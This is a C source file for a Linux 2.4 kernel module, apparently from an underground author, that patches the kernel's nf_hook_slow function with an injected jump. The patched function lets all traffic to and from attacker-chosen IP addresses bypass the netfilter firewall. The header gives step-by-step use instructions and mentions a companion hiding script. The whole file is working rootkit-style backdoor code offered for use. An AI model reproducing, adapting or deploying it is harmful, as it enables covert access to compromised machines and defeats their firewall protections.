/*
   m00-needle.c
      
   Ok. This code allow us to bypass any firewall working
   through netfilter.   
   
   IMPORTANT PART
   You should find and modify the address of a function 
   nf_hook_slow(). 
   Example:
   #cat /proc/ksyms | grep nf_hook_slow
   c01f4cfc nf_hook_slow_Ra05f0be4
   
   Then we modify:
   int (*yo_nf_hook_slow)(int pf, unsigned int hook, struct sk_buff *skb,
		 struct net_device *indev,
		 struct net_device *outdev,
		 int (*okfn)(struct sk_buff *))=(int(*)(int))0xc01f4cfc;
                                                             ^^^^^^^^^^
   Almost done :)
                                                            
   Fill in the array "our_ip" with your addresses. Set a variable
   "indi" in an amount of addresses contained in the array.
   From these addresses you will be able to access any port.
   Briefly: all ip traffic from these addresses without 
   hindrances will reach the computer and vise versa. 
   From this computer it will be possible to reach these addresses 
   without hindrances of local firewall.
   
   compile:
   # gcc -c m00-needle.c -I /usr/src/linux/include
   # gcc -c hide.c -I /usr/src/linux/include
   # ./start
   
   tested on kernel: 2.4.3-20, 2.4.20-8, 2.4.22;
   
   Greets to h0snp :) Thanks for docs man ;)
   
   by / rash / m00 / m00.blackhat.ru / m00@irc.blackhat.ru     
*/

#define __KERNEL__
#define MODULE

#ifdef MODVERSIONS
#include <linux/modversions.h>
#endif

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/skbuff.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/netdevice.h>
#include <linux/if_arp.h>
#include <linux/if_ether.h>
#include <linux/interrupt.h>
#include <linux/if.h>
#include <linux/brlock.h>

MODULE_LICENSE("GPL");

/* counts ip in our_ip array */
static int indi = 2;
/* Our ip addresses*/
static unsigned char *our_ip[] = {"192.168.0.5", "192.168.0.2"};

int (*yo_nf_hook_slow)(int pf, unsigned int hook, struct sk_buff *skb,
		 struct net_device *indev,
		 struct net_device *outdev,
		 int (*okfn)(struct sk_buff *))=(int(*)(int))0x00000000;
//                                                CHANGE IT!!! ^^^^^^^^

#define JMPCODE 7

static char orignial_nf_code[7];
static char inj_code[7]= "\xb8\x00\x00\x00\x00"   /* movl $0,%eax */
                         "\xff\xe0";              /* jmp %eax */

char *m_memcpy(void *dest, const void *src, int size)
{
  const char *p = src;
  char *q = dest;
  int i;
  
  for (i = 0; i < size; i++) *q++=*p++;
  
  return dest;  
}

int _nf_hook_slow(int pf, unsigned int hook, struct sk_buff *skb,
		 struct net_device *indev,
		 struct net_device *outdev,
		 int (*okfn)(struct sk_buff *))
{
  int ret, i, res;    
  /* code from realy function */
  /* This stopgap cannot be removed until all the hooks are audited. */
  if (skb_is_nonlinear(skb) && skb_linearize(skb, GFP_ATOMIC) != 0) {
 	kfree_skb(skb);
	return -ENOMEM;
  }
  if (skb->ip_summed == CHECKSUM_HW) {
  	if (outdev == NULL) {
		skb->ip_summed = CHECKSUM_NONE;
	} else {
		skb_checksum_help(skb);
	}
  }
 
#ifdef CONFIG_NETFILTER_DEBUG
  skb->nf_debug |= (1 << hook);
#endif
  
  /* ok, now our code */  
  res = 0;
  ret = 0;  

  /* checking ip address */
  for (i=0; i<indi; i++) {
    if ((skb->nh.iph->saddr == in_aton(our_ip[i]))||
       (skb->nh.iph->daddr == in_aton(our_ip[i]))) {
          res = 1;
          break;
    }
  }
  
  if(res){           // if ours - is skipped
    br_read_lock_bh(BR_NETPROTO_LOCK);
    ret = okfn(skb);
    br_read_unlock_bh(BR_NETPROTO_LOCK);
  }else{             // else - calling real function
    m_memcpy(yo_nf_hook_slow, orignial_nf_code, JMPCODE);
    ret = yo_nf_hook_slow(pf, hook, skb, indev, outdev, okfn);
    m_memcpy(yo_nf_hook_slow, inj_code, JMPCODE);    
  }
  
  return ret;
}

int init_module(void)
{
  /* Checking on dullness :) */
  if (yo_nf_hook_slow == 0x00000000){
   printk("\nYou nothing have forgotten?\n*** Change address, dude! ***\n\n");
   return -1;
  }
  *(long *)&inj_code[1] = (long)_nf_hook_slow;
  m_memcpy(orignial_nf_code, yo_nf_hook_slow, JMPCODE);
  m_memcpy(yo_nf_hook_slow, inj_code, JMPCODE);
  return 0;  
}

void cleanup_module(void)
{
  m_memcpy(yo_nf_hook_slow, orignial_nf_code, JMPCODE);  
}
